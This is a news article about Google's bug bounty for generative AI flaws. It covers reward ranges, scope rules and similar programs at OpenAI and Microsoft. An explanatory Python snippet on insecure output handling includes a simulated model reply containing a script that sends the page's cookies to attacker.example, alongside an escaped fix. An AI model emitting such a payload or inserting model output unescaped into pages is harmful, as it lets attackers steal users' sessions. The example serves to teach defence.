
Google Offers Bug Bounties for Generative AI Security Vulnerabilities


Google’s Vulnerability Reward Program offers up to $31,337 for finding potential hazards. Google joins OpenAI and Microsoft in rewarding AI bug hunts.

Google logo at the Googleplex in Mountain View, California, in Silicon Valley.
Image: Markus Mainka/Adobe Stock

Google expanded its Vulnerability Rewards Program to include bugs and vulnerabilities that might be found in generative AI. Specifically, Google is looking for bug hunters for its own generative AI products, such as Google Bard, which is available in many countries, or Google Cloud’s Contact Center AI, Agent Assist.

“We believe this will incentivize research around AI safety and security, and bring potential issues to light that will ultimately make AI safer for everyone,” Google’s Vice President of Trust and Safety Laurie Richardson and Vice President of Privacy, Safety and Security Engineering Royal Hansen wrote in an Oct. 26 blog post. “We’re also expanding our open source security work to make information about AI supply chain security universally discoverable and verifiable.”


Google’s bug bounty program: Limitations and rewards

There are limitations on what counts as a vulnerability in generative AI; a complete list of which vulnerabilities Google considers in scope or out of scope for the Vulnerability Rewards Program can be found in this Google security blog.

Generative AI introduces risks that conventional computing doesn’t; these risks include unfair bias, model manipulation and misinterpretation of data, Richardson and Hansen wrote. Notably, AI “hallucinations” (misinformation generated within a private browsing session) don’t count as vulnerabilities for the purposes of the Vulnerability Rewards Program. Attacks that expose sensitive information, change the state of a Google user’s account without their consent or provide backdoors into a generative AI model are within scope.

Ultimately, anyone participating in the bug bounty must demonstrate that the vulnerability they discover could “pose a compelling attack scenario or feasible path to Google or user harm,” according to the Google security blog.

Potential Google AI bug bounty rewards

Rewards for the Vulnerability Rewards Program range from $100 to $31,337, depending on the type of vulnerability. Details on rewards and payouts can be found on Google’s Bug Hunters site.

Other bug bounties and common attack types in generative AI

OpenAI, Microsoft and other organizations offer bug bounties for white hat hackers who find vulnerabilities in generative AI systems. Microsoft offers between $2,000 and $15,000 for qualifying bugs. OpenAI’s bug bounty program pays between $200 and $20,000.

SEE: IBM X-Force researchers found phishing emails written by people are slightly more likely to get clicks than those written by ChatGPT. (TechRepublic)

In an October 26 report, HackerOne and OWASP found that the most common vulnerability in generative AI was prompt injection (i.e., using prompts to make the AI model do something it was not intended to do), followed by insecure output handling (i.e., when LLM output is accepted without scrutiny) and the manipulation of training data.
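To make the second of those concrete, here is a minimal, hypothetical sketch of insecure output handling in a web app: the model’s reply is dropped into an HTML page without escaping, so an attacker who steers that reply through prompt injection can run script in a victim’s browser. The `call_llm` function and its canned reply are illustrative stand-ins, not a real API, and the safer variant simply escapes the output before rendering.

```python
import html

def call_llm(prompt: str) -> str:
    # Stand-in for any chat-completion API; simulates a reply an attacker
    # has steered with an instruction hidden in the content being summarized.
    return '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'

def render_insecure(request: str) -> str:
    reply = call_llm(request)
    # LLM output is trusted blindly and inserted straight into the page.
    return f"<div class='summary'>{reply}</div>"

def render_safer(request: str) -> str:
    reply = call_llm(request)
    # Escape model output before rendering so injected markup stays inert text.
    return f"<div class='summary'>{html.escape(reply)}</div>"

if __name__ == "__main__":
    print(render_insecure("Summarize this web page for me"))
    print(render_safer("Summarize this web page for me"))
```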

How to learn to use generative AI

Developers and security researchers just starting out with generative AI have plenty of options when it comes to learning how to use it, from experimenting with free applications such as ChatGPT to taking professional courses. DeepLearning.AI has courses at both beginner and advanced levels for professionals who want to learn how to use and develop for artificial intelligence and machine learning.
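For those who would rather experiment programmatically than through a chat interface, a first API call can be as short as the sketch below. This assumes the `openai` Python package is installed, an `OPENAI_API_KEY` environment variable is set, and the chosen model name is still offered; swap in whichever provider and model you actually use.

```python
from openai import OpenAI

# The client reads the OPENAI_API_KEY environment variable by default.
client = OpenAI()

response = client.chat.completions.create(
    model="gpt-4o-mini",  # assumed model name; substitute any available model
    messages=[{"role": "user", "content": "Explain prompt injection in two sentences."}],
)

# Print the model's reply text.
print(response.choices[0].message.content)
```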
